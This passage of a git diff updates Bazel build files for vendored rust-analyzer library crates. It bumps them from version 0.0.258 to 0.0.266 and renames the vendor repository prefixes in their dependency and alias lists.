@@ -91,24 +91,25 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__arrayvec-0.7.6//:arrayvec", - "@vendor__either-1.13.0//:either", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", - "@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand", - "@vendor__ra_ap_hir_ty-0.0.258//:ra_ap_hir_ty", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__arrayvec-0.7.6//:arrayvec", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", + "@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand", + "@vendor_ts__ra_ap_hir_ty-0.0.266//:ra_ap_hir_ty", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_def-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_def-0.0.266.bazel similarity index 61% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_def-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_def-0.0.266.bazel index 1018a98e564d..a8280467c4d9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_def-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_def-0.0.266.bazel @@ -17,16 +17,15 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db": "base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg": "cfg", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand": "hir_expand", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit": "limit", - "@vendor__ra_ap_mbe-0.0.258//:ra_ap_mbe": "mbe", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db": "base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg": "cfg", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand": "hir_expand", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_mbe-0.0.266//:ra_ap_mbe": "mbe", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], 
@@ -91,36 +90,36 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__arrayvec-0.7.6//:arrayvec", - "@vendor__bitflags-2.7.0//:bitflags", - "@vendor__cov-mark-2.0.0//:cov_mark", - "@vendor__dashmap-5.5.3//:dashmap", - "@vendor__drop_bomb-0.1.5//:drop_bomb", - "@vendor__either-1.13.0//:either", - "@vendor__fst-0.4.7//:fst", - "@vendor__hashbrown-0.14.5//:hashbrown", - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__la-arena-0.3.1//:la_arena", - "@vendor__ra-ap-rustc_abi-0.87.0//:ra_ap_rustc_abi", - "@vendor__ra-ap-rustc_parse_format-0.87.0//:ra_ap_rustc_parse_format", - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit", - "@vendor__ra_ap_mbe-0.0.258//:ra_ap_mbe", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:rustc_apfloat", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__text-size-1.1.1//:text_size", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__arrayvec-0.7.6//:arrayvec", + "@vendor_ts__bitflags-2.8.0//:bitflags", + "@vendor_ts__cov-mark-2.0.0//:cov_mark", + "@vendor_ts__dashmap-5.5.3//:dashmap", + "@vendor_ts__drop_bomb-0.1.5//:drop_bomb", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__fst-0.4.7//:fst", + "@vendor_ts__hashbrown-0.14.5//:hashbrown", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__la-arena-0.3.1//:la_arena", + 
"@vendor_ts__ra-ap-rustc_abi-0.97.0//:ra_ap_rustc_abi", + "@vendor_ts__ra-ap-rustc_hashes-0.97.0//:ra_ap_rustc_hashes", + "@vendor_ts__ra-ap-rustc_parse_format-0.97.0//:ra_ap_rustc_parse_format", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_mbe-0.0.266//:ra_ap_mbe", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:rustc_apfloat", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__text-size-1.1.1//:text_size", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_expand-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_expand-0.0.266.bazel similarity index 67% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_expand-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_expand-0.0.266.bazel index 6baf3717b846..8c89fecda8d8 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_expand-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_expand-0.0.266.bazel 
@@ -17,17 +17,16 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db": "base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg": "cfg", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit": "limit", - "@vendor__ra_ap_mbe-0.0.258//:ra_ap_mbe": "mbe", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser": "parser", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_syntax-bridge-0.0.258//:ra_ap_syntax_bridge": "syntax_bridge", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db": "base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg": "cfg", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_mbe-0.0.266//:ra_ap_mbe": "mbe", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser": "parser", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_syntax-bridge-0.0.266//:ra_ap_syntax_bridge": "syntax_bridge", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], 
@@ -92,27 +91,26 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__cov-mark-2.0.0//:cov_mark", - "@vendor__either-1.13.0//:either", - "@vendor__hashbrown-0.14.5//:hashbrown", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__la-arena-0.3.1//:la_arena", - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit", - "@vendor__ra_ap_mbe-0.0.258//:ra_ap_mbe", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_syntax-bridge-0.0.258//:ra_ap_syntax_bridge", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__cov-mark-2.0.0//:cov_mark", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__hashbrown-0.14.5//:hashbrown", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__la-arena-0.3.1//:la_arena", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_mbe-0.0.266//:ra_ap_mbe", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_syntax-bridge-0.0.266//:ra_ap_syntax_bridge", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__tracing-0.1.41//:tracing", + 
"@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_ty-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_ty-0.0.266.bazel similarity index 60% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_ty-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_ty-0.0.266.bazel index ea0475075893..9770a5812cf5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_ty-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_hir_ty-0.0.266.bazel @@ -17,14 +17,13 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db": "base_db", - "@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def": "hir_def", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand": "hir_expand", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit": "limit", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db": "base_db", + "@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def": "hir_def", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand": "hir_expand", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", }, compile_data = glob( include = ["**"], @@ -41,7 +40,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__chalk-derive-0.98.0//:chalk_derive", + "@vendor_ts__chalk-derive-0.99.0//:chalk_derive", ], rustc_flags = [ "--cap-lints=allow", 
@@ -92,38 +91,38 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__arrayvec-0.7.6//:arrayvec", - "@vendor__bitflags-2.7.0//:bitflags", - "@vendor__chalk-ir-0.98.0//:chalk_ir", - "@vendor__chalk-recursive-0.98.0//:chalk_recursive", - "@vendor__chalk-solve-0.98.0//:chalk_solve", - "@vendor__cov-mark-2.0.0//:cov_mark", - "@vendor__either-1.13.0//:either", - "@vendor__ena-0.14.3//:ena", - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__la-arena-0.3.1//:la_arena", - "@vendor__nohash-hasher-0.2.0//:nohash_hasher", - "@vendor__oorandom-11.1.4//:oorandom", - "@vendor__ra-ap-rustc_abi-0.87.0//:ra_ap_rustc_abi", - "@vendor__ra-ap-rustc_index-0.87.0//:ra_ap_rustc_index", - "@vendor__ra-ap-rustc_pattern_analysis-0.87.0//:ra_ap_rustc_pattern_analysis", - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", - "@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:rustc_apfloat", - "@vendor__scoped-tls-1.0.1//:scoped_tls", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", - "@vendor__typed-arena-2.0.2//:typed_arena", + "@vendor_ts__arrayvec-0.7.6//:arrayvec", + "@vendor_ts__bitflags-2.8.0//:bitflags", + "@vendor_ts__chalk-ir-0.99.0//:chalk_ir", + "@vendor_ts__chalk-recursive-0.99.0//:chalk_recursive", + "@vendor_ts__chalk-solve-0.99.0//:chalk_solve", + "@vendor_ts__cov-mark-2.0.0//:cov_mark", + "@vendor_ts__either-1.14.0//:either", + 
"@vendor_ts__ena-0.14.3//:ena", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__la-arena-0.3.1//:la_arena", + "@vendor_ts__nohash-hasher-0.2.0//:nohash_hasher", + "@vendor_ts__oorandom-11.1.4//:oorandom", + "@vendor_ts__ra-ap-rustc_abi-0.97.0//:ra_ap_rustc_abi", + "@vendor_ts__ra-ap-rustc_hashes-0.97.0//:ra_ap_rustc_hashes", + "@vendor_ts__ra-ap-rustc_index-0.97.0//:ra_ap_rustc_index", + "@vendor_ts__ra-ap-rustc_pattern_analysis-0.97.0//:ra_ap_rustc_pattern_analysis", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", + "@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__rustc_apfloat-0.2.1-llvm-462a31f5a5ab//:rustc_apfloat", + "@vendor_ts__scoped-tls-1.0.1//:scoped_tls", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", + "@vendor_ts__typed-arena-2.0.2//:typed_arena", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_ide_db-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_ide_db-0.0.266.bazel similarity index 68% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_ide_db-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_ide_db-0.0.266.bazel index c81b3c20fac0..3b6ecbc023c6 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_ide_db-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_ide_db-0.0.266.bazel 
@@ -17,14 +17,13 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db": "base_db", - "@vendor__ra_ap_hir-0.0.258//:ra_ap_hir": "hir", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit": "limit", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser": "parser", - "@vendor__ra_ap_profile-0.0.258//:ra_ap_profile": "profile", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db": "base_db", + "@vendor_ts__ra_ap_hir-0.0.266//:ra_ap_hir": "hir", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser": "parser", + "@vendor_ts__ra_ap_profile-0.0.266//:ra_ap_profile": "profile", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", }, compile_data = glob( include = ["**"], 
@@ -89,30 +88,29 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__arrayvec-0.7.6//:arrayvec", - "@vendor__bitflags-2.7.0//:bitflags", - "@vendor__cov-mark-2.0.0//:cov_mark", - "@vendor__crossbeam-channel-0.5.14//:crossbeam_channel", - "@vendor__either-1.13.0//:either", - "@vendor__fst-0.4.7//:fst", - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__line-index-0.1.2//:line_index", - "@vendor__memchr-2.7.4//:memchr", - "@vendor__nohash-hasher-0.2.0//:nohash_hasher", - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", - "@vendor__ra_ap_hir-0.0.258//:ra_ap_hir", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", - "@vendor__ra_ap_profile-0.0.258//:ra_ap_profile", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__rayon-1.10.0//:rayon", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__arrayvec-0.7.6//:arrayvec", + "@vendor_ts__bitflags-2.8.0//:bitflags", + "@vendor_ts__cov-mark-2.0.0//:cov_mark", + "@vendor_ts__crossbeam-channel-0.5.14//:crossbeam_channel", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__fst-0.4.7//:fst", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__line-index-0.1.2//:line_index", + "@vendor_ts__memchr-2.7.4//:memchr", + "@vendor_ts__nohash-hasher-0.2.0//:nohash_hasher", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", + "@vendor_ts__ra_ap_hir-0.0.266//:ra_ap_hir", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", + "@vendor_ts__ra_ap_profile-0.0.266//:ra_ap_profile", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + 
"@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__rayon-1.10.0//:rayon", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_intern-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_intern-0.0.266.bazel similarity index 93% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_intern-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_intern-0.0.266.bazel index ad2a8bb0bc99..a36d7b0d3cb5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_intern-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_intern-0.0.266.bazel @@ -79,12 +79,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__dashmap-5.5.3//:dashmap", - "@vendor__hashbrown-0.14.5//:hashbrown", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__sptr-0.3.2//:sptr", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__dashmap-5.5.3//:dashmap", + "@vendor_ts__hashbrown-0.14.5//:hashbrown", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_load-cargo-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_load-cargo-0.0.266.bazel similarity index 69% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_load-cargo-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_load-cargo-0.0.266.bazel index 90360799291d..09abc14852e5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_load-cargo-0.0.258.bazel 
+++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_load-cargo-0.0.266.bazel @@ -17,16 +17,16 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand": "hir_expand", - "@vendor__ra_ap_ide_db-0.0.258//:ra_ap_ide_db": "ide_db", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths": "paths", - "@vendor__ra_ap_proc_macro_api-0.0.258//:ra_ap_proc_macro_api": "proc_macro_api", - "@vendor__ra_ap_project_model-0.0.258//:ra_ap_project_model": "project_model", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs": "vfs", - "@vendor__ra_ap_vfs-notify-0.0.258//:ra_ap_vfs_notify": "vfs_notify", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand": "hir_expand", + "@vendor_ts__ra_ap_ide_db-0.0.266//:ra_ap_ide_db": "ide_db", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths": "paths", + "@vendor_ts__ra_ap_proc_macro_api-0.0.266//:ra_ap_proc_macro_api": "proc_macro_api", + "@vendor_ts__ra_ap_project_model-0.0.266//:ra_ap_project_model": "project_model", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs": "vfs", + "@vendor_ts__ra_ap_vfs-notify-0.0.266//:ra_ap_vfs_notify": "vfs_notify", }, compile_data = glob( include = ["**"], 
@@ -91,21 +91,21 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__anyhow-1.0.95//:anyhow", - "@vendor__crossbeam-channel-0.5.14//:crossbeam_channel", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand", - "@vendor__ra_ap_ide_db-0.0.258//:ra_ap_ide_db", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", - "@vendor__ra_ap_proc_macro_api-0.0.258//:ra_ap_proc_macro_api", - "@vendor__ra_ap_project_model-0.0.258//:ra_ap_project_model", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs", - "@vendor__ra_ap_vfs-notify-0.0.258//:ra_ap_vfs_notify", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__anyhow-1.0.96//:anyhow", + "@vendor_ts__crossbeam-channel-0.5.14//:crossbeam_channel", + 